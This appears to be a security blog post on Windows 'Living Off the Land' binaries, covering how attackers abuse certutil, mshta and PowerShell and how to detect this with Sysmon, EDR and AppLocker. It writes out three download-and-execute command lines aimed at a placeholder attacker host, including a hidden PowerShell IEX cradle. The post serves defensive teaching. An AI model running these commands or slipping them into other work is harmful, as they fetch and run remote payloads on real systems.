LOLBins: Binaries Laughing Out Loud

Let’s put aside the “Hollywood” movie portrayals of hacking; none of these attacks involve custom malware or weird 0-days. Some of the worst attacks being carried out utilize the software that was shipped with your machine right out of the box for legitimate tasks.

That’s what LOLBins are (NOT Laugh Out Loud). Living Off the Land Binaries legitimate Windows executables that attackers repurpose to do their malicious work. Since these tools are signed by Microsoft and trusted by your OS, most security software never thinks twice about them. That’s exactly the point.

The three you’ll encounter most

1. certutil.exe is a certificate management utility. Totally boring, totally legitimate. Attackers use it to download payloads straight from the internet and decode base64-encoded files on the fly:

certutil -urlcache -split -f http://attacker.com/payload.exe payload.exe

No browser. No PowerShell. Just a certificate tool fetching malware, and most environments won’t flag it.

2. mshta.exe runs Microsoft HTML Application files. Admins use it occasionally. Attackers love it because a single line can execute a remote script the moment it's run. One command, remote code execution. The script never even has to touch disk.

mshta http://attacker.com/payload.hta

3. powershell.exe barely needs an introduction, but the real abuse pattern worth knowing is in-memory execution. The command below downloads and runs a script without saving any file:

powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')"

The flags tell the story: -nop skips the profile, -w hidden keeps the window invisible, and IEX executes whatever comes back from the URL. If you ever see these three together in a log, stop what you're doing.

Where they show up in an attack

LOLBins don’t belong to one phase of an attack. They span the whole chain. During execution, certutil and mshta drop or run payloads. For persistence, schtasks.exe and reg.exe quietly create scheduled tasks or touch registry keys. Lateral movement often goes through wmic.exe. Even data exfiltration has its LOLBin (bitsadmin.exe), a background file transfer service, has been used to move stolen data out of networks.

The LOLBAS project at lolbas-project.github.io catalogs every one of these tools with exact commands and their MITRE ATT&CK mappings. If you haven’t bookmarked it, do it now.

Why detection is genuinely hard

These tools run hundreds of times a day in normal environments. The attacker’s usage looks almost identical to the admin’s usage. What separates the two is context, what process spawned the tool, what arguments were passed, what happened right after.

A few patterns that should always raise questions: certutil or mshta making outbound network connections. PowerShell launched with encoded commands or hidden window flags. Any LOLBin spawning cmd.exe as a child process. LOLBins writing files to %Temp% or AppData.

Sysmon is your best starting point. Event ID 1 captures full process creation with command-line arguments, that’s where most of this becomes visible. Layer that with PowerShell’s ScriptBlockLogging and you have solid coverage. EDR tools like CrowdStrike or Microsoft Defender for Endpoint track the full process tree, which makes spotting abuse chains much faster than reading raw logs.

Application whitelisting via AppLocker adds another layer by restricting which paths binaries can execute from. It doesn’t eliminate the problem, but it raises the bar significantly.

Why this matters for you right now

LOLBin abuse isn’t an advanced technique reserved for nation-state actors anymore. It shows up in commodity ransomware, phishing campaigns, and red team engagements targeting organizations of every size. Understanding it is what separates someone who knows security theory from someone who actually understands how attacks land.

Next step is to spin up a Windows VM, install Sysmon with a decent config, run some of these commands, and watch what gets logged. The gap between “I read about this” and “I’ve seen it in logs” changes how you think about detection entirely.